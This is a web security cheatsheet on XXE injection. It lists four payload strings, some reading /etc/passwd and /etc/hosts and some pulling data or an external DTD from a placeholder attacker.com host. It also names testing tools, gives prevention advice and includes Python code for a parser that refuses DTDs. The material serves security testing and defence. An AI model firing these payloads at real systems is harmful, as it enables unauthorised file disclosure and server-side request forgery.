
XXE Injection

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

XXE (XML External Entity) Injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It occurs when XML input containing a reference to an external entity is processed by an XML parser that still has DTD processing and external entity resolution enabled.

XXE attacks can be used to read local files, perform SSRF attacks, cause denial of service, and in some cases achieve remote code execution.

Category: Web

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting XXE Injection:

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/data">]><root>&xxe;</root>
<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><svg>&xxe;</svg>
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/ext.dtd"> %xxe;]>

Tools & Techniques

Recommended tools for XXE Injection:

  • Test in SOAP/XML-RPC APIs, XML file uploads, RSS feeds, SAML assertions
  • xxe.sh: automated XXE testing tool
  • Burp Suite: Collaborator for out-of-band detection
  • Manual SVG upload testing

Prevention & Mitigation

Security recommendations to prevent XXE Injection:

  • Disable external entity processing in XML parsers (general and parameter entities), and reject DOCTYPE declarations entirely when the application never needs a DTD
  • Use less complex data formats like JSON when possible
  • Implement proper input validation for XML content
  • Apply the principle of least privilege to the XML parser configuration: enable only the features the application actually uses (no DTDs, no entity expansion, no network access from the parser)
  • Regularly update XML parsing libraries
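The first and fourth recommendations in practice, as an added example that is not part of the original cheatsheet: a hardened parser built on Python's standard-library expat bindings that aborts on any DOCTYPE, entity declaration or external entity reference, so the file-read and external-DTD payloads listed above are refused before anything is resolved, while a benign document still parses. The sample inputs are constructed here.

```python
"""Hardened XML parsing for untrusted input: refuse the DTD outright."""
from xml.parsers import expat


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, entity or external reference."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source with every DTD feature switched off.

    Returns the element names and text seen. Any DOCTYPE, entity declaration or
    external entity reference raises UnsafeXMLError before it can be resolved,
    which blocks file disclosure, SSRF via SYSTEM URLs and entity-expansion DoS.
    """
    parser = expat.ParserCreate()
    # Never fetch external parameter entities (the "%xxe;" external-DTD trick).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    elements, text_parts = [], []

    def refuse_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE refused (name={name!r}, system id={sysid!r})")

    def refuse_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration refused: {name!r}")

    def refuse_external(context, base, sysid, pubid):
        raise UnsafeXMLError(f"external entity reference refused: {sysid!r}")

    parser.StartDoctypeDeclHandler = refuse_doctype
    parser.EntityDeclHandler = refuse_entity
    parser.ExternalEntityRefHandler = refuse_external
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.CharacterDataHandler = text_parts.append
    parser.Parse(data, True)  # exceptions raised inside handlers propagate from here
    return {"elements": elements, "text": "".join(text_parts)}


def is_rejected(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return True
    return False


# Constructed inputs: two payloads from this cheatsheet and one benign document.
FILE_READ_PAYLOAD = b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
EXTERNAL_DTD_PAYLOAD = b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/ext.dtd"> %xxe;]>'
BENIGN_DOCUMENT = b'<?xml version="1.0"?><order><item sku="A1">2</item></order>'

if __name__ == "__main__":
    for label, doc in [("file read", FILE_READ_PAYLOAD), ("external DTD", EXTERNAL_DTD_PAYLOAD), ("benign", BENIGN_DOCUMENT)]:
        print(label, "-> rejected" if is_rejected(doc) else parse_untrusted_xml(doc))
```

The same three handlers are what a library such as defusedxml installs for you; if the application genuinely needs a DTD, keep the external-entity and parameter-entity refusals and drop only the DOCTYPE one.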
